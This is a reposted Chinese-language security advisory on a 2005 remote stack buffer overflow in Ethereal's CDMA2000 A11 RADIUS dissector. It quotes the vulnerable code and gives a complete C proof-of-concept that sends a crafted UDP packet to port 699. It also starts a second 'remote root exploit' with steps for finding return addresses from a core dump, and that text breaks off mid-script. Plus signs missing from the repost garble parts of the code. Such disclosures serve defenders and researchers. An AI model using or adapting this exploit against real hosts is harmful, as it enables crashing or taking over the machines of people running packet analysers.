Ethereal CDMA2000 A11报文处理模块远程缓冲区溢…

2008-04-09 04:24:52来源：互联网阅读 ()

Ethereal CDMA2000 A11报文处理模块远程缓冲区溢出漏洞

发布日期：2005-03-09
更新日期：2005-03-09

受影响系统：

Ethereal Group Ethereal 0.10.9
Ethereal Group Ethereal 0.10.8
Ethereal Group Ethereal 0.10.7
Ethereal Group Ethereal 0.10.6
Ethereal Group Ethereal 0.10.5
Ethereal Group Ethereal 0.10.4
Ethereal Group Ethereal 0.10.3
Ethereal Group Ethereal 0.10.2
Ethereal Group Ethereal 0.10.1
Ethereal Group Ethereal 0.10

描述：

Ethereal是很多网络专业人员都在使用的网络协议分析器，可以用来分析网络的运行状况，支持几乎所有协议。

Ethereal的CDMA2000 A11报文处理模块中存在远程缓冲区漏洞。漏洞存在于RADIUS认证模块所使用的packet-3g-a11.c的dissect_a11_radius()函数中。从报文拷贝到栈中缓冲区的字节数是从报文本身获取的。该缓冲区保留了16字节，但字符串长度最高可达256字节（无符字符型），因此攻击者可能溢出本地变量和返回地址。

packet-3g-a11.c:
----------------
#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
size_t radius_len;
...
guchar str_val[MAX_STRVAL];
...
radius_len = tvb_get_guint8(tvb, offset 1);
...
strncpy(str_val, tvb_get_ptr(tvb,offset 2,radius_len-2), radius_len-2);
...
}
----------------

在下面几行的同一个函数中也发现了类似的漏洞。该函数将RADIUS属性拷贝至栈。

packet-3g-a11.c:
----------------
#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
guint attribute_len;
...
guchar str_val[MAX_STRVAL];
...
attribute_len = tvb_get_guint8(tvb, offset radius_offset 1);
...
case ATTR_TYPE_STR:
strncpy(str_val,tvb_get_ptr(tvb,offset radius_offset 2,attribute_len - 2),
attribute_len - 2);

...
}
----------------

<*来源：LSS Security （exposed@lss.hr）
Leon Juranic （ljuranic@LSS.hr）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111032119424935&w=2
http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-03-04
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

["eth0day.c" (text/plain)]

/*
*
* Ethereal 3G-A11 remote buffer overflow PoC exploit
* --------------------------------------------------
* Coded by Leon Juranic <ljuranic@lss.hr>
* LSS Security <http://security.lss.hr/en/>
*
*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

main (int argc, char **argv)
{
int sock;
struct sockaddr_in sin;
unsigned char buf[1024];
char bla[200];

sock=socket(AF_INET,SOCK_DGRAM,0);

sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(699);

buf[0] = 22;
memset(buf 1,'A',19);
buf[20] = 38;
*(unsigned short*)&buf[22] = htons(100);
*(unsigned short*)&buf[28] = 0x0101;
buf[30] = 31;
buf[31] = 150; // len for overflow...play with this value if it doesn't work

memset (bla,'B',200);
strncpy (buf 32,bla,180);

sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
}

/*
* Ethereal 0.10.9 and below proof-of-concept remote root exploit
* (c) 2005 Diego Giagio <dgiagio irion com br>
*
* The CDMA2000 A11 protocol dissector (packet-3g-a11.c) has a stack overflow
* vulnerability when decoding Airlink records. This vulnerability was also
* discovered by Diego Giagio on 01/March/2005. The vendor was imediatelly
* contacted.
*
*
* Notes:
*
* This program has only been tested on Linux.
*
* If your system isn't on the target list and you are running Linux (x86), you
* can easily find your system's ret address. See below:
*
* First you need to force Ethereal dump a core file.
* bash$ ./ethereal-g3-a11 -a 0xdeadbeef -s 1 -d <your_machine_ip> -p 65535
*
* Then, use the script below to find the ret address from the core file:
* --snip--
* #!/bin/sh
*
* ADDR=`objdump -D -s core | * grep "90909090 90909090 90909090 90909090" | * head

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有